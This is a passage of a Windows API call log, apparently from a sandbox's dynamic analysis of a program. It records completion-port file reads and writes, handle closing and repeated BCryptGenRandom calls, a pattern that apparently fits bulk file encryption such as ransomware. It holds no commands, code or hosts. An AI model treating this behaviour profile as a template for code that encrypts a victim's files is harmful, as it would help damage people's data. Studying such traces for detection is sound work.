GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0101.616] ReadFile (in: hFile=0x13e4, lpBuffer=0x3e3003c, nNumberOfBytesToRead=0x33c6, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30008 | out: lpBuffer=0x3e3003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30008) returned 0x0 [0101.633] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0101.670] CloseHandle (hObject=0x13e4) returned 1 [0101.674] free (_Block=0x3e30008) [0101.674] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0101.681] WriteFile (in: hFile=0xcb0, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x2190, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0101.681] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0101.684] WriteFile (in: hFile=0xcb4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1320, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0101.685] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0101.688] WriteFile (in: hFile=0xca0, lpBuffer=0x3e700ac*, nNumberOfBytesToWrite=0x1500, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70078 | out: lpBuffer=0x3e700ac*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70078) returned 1 [0101.689] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0101.847] ReadFile (in: hFile=0xcac, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x2420, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0101.848] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0101.848] CloseHandle (hObject=0xcac) returned 1 [0101.856] free (_Block=0x3ef0008) [0101.857] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0101.877] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.879] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.879] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0101.879] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.880] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.880] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0101.883] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0101.883] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0101.883] free (_Block=0x77d800) [0101.883] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0101.883] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0101.884] free (_Block=0x2071818) [0101.884] free (_Block=0x2071928) [0101.884] free (_Block=0x77d908) [0101.884] WriteFile (in: hFile=0xcac, lpBuffer=0x3d7007c, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 0x0 [0101.884] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0101.902] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.904] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.904] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0101.904] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.905] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.905] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0101.908] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0101.908] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0101.908] free (_Block=0x77d800) [0101.908] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0101.909] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0101.909] free (_Block=0x2071818) [0101.909] free (_Block=0x2071928) [0101.909] free (_Block=0x77d908) [0101.909] WriteFile (in: hFile=0xef8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0101.909] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0101.923] WriteFile (in: hFile=0xcac, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x13a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0101.923] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0101.933] ReadFile (in: hFile=0xefc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0xf7e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0101.933] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0101.949] ReadFile (in: hFile=0xf00, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0xd32, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 1 [0101.949] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0101.957] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.958] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.958] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0101.958] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.960] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.960] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0101.960] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0101.960] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0101.960] free (_Block=0x77d800) [0101.960] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0101.960] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0101.961] free (_Block=0x2071818) [0101.961] free (_Block=0x2071928) [0101.961] free (_Block=0x77d908) [0101.961] WriteFile (in: hFile=0xcac, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0101.961] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0101.998] CloseHandle (hObject=0xcac) returned 1 [0102.000] free (_Block=0x3d70048) [0102.000] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0102.010] WriteFile (in: hFile=0xefc, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0xbe0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0102.010] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0102.028] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.030] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.030] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0102.030] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.031] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.031] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0102.031] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0102.031] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0102.031] free (_Block=0x77d800) [0102.031] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0102.031] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0102.032] free (_Block=0x2071818) [0102.032] free (_Block=0x2071928) [0102.032] free (_Block=0x77d908) [0102.032] WriteFile (in: hFile=0xcac, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0102.032] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0102.034] WriteFile (in: hFile=0xcac, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x1640, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0102.034] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0102.546] WriteFile (in: hFile=0xf00, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x16d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0102.546] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0102.556] CloseHandle (hObject=0x13c0) returned 1 [0102.564] free (_Block=0x3ef0008) [0102.564] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0102.575] CloseHandle (hObject=0x13c4) returned 1 [0102.586] free (_Block=0x3d70048) [0102.586] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0102.602] WriteFile (in: hFile=0xf04, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x1cd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0102.603] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0102.622] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x19e8, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0102.637] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0102.677] WriteFile (in: hFile=0x13c4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x840, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0102.677] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0102.747] ReadFile (in: hFile=0xf00, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x928, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0102.747] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0102.751] ReadFile (in: hFile=0x13c8, lpBuffer=0x3e300ac, nNumberOfBytesToRead=0x17ac, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30078 | out: lpBuffer=0x3e300ac*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30078) returned 1 [0102.769] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0102.769] CloseHandle (hObject=0x13c8) returned 1 [0102.775] free (_Block=0x3e30078) [0102.779] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0103.243] ReadFile (in: hFile=0x13b4, lpBuffer=0x3e7011c, nNumberOfBytesToRead=0xd58, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e700e8 | out: lpBuffer=0x3e7011c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e700e8) returned 0x0 [0103.243] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0103.258] CloseHandle (hObject=0x13b4) returned 1 [0103.261] free (_Block=0x3e700e8) [0103.261] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0103.273] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xa4c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0103.273] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0103.285] ReadFile (in: hFile=0x13c8, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x19ec, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0103.298] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0103.307] ReadFile (in: hFile=0xf00, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0xc48, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0103.307] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0103.339] CloseHandle (hObject=0xf00) returned 1 [0103.340] free (_Block=0x3ef0008) [0103.340] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0103.353] ReadFile (in: hFile=0x13c8, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x212c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0103.359] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0103.514] CloseHandle (hObject=0x304) returned 1 [0103.516] free (_Block=0x3ef0008) [0103.516] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0103.522] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.522] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0103.523] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.523] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0103.526] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0103.526] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0103.526] free (_Block=0x77d800) [0103.526] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0103.526] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0103.527] free (_Block=0x2071818) [0103.527] free (_Block=0x2071928) [0103.527] free (_Block=0x77d908) [0103.527] WriteFile (in: hFile=0x814, lpBuffer=0x3db00ec*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 1 [0103.527] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0103.532] CloseHandle (hObject=0x81c) returned 1 [0103.537] free (_Block=0x1ff1e60) [0103.537] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0103.543] CloseHandle (hObject=0x2f8) returned 1 [0103.548] free (_Block=0x3d70048) [0103.548] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0103.554] ReadFile (in: hFile=0x304, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x1cd8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0103.568] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0103.578] ReadFile (in: hFile=0x2f8, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x1306, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0103.588] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0103.589] CloseHandle (hObject=0x2f8) returned 1 [0103.590] free (_Block=0x3d70048) [0103.590] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0103.591] WriteFile (in: hFile=0x814, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x6910, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0103.591] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0103.621] ReadFile (in: hFile=0x304, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x2d74, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0103.625] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, 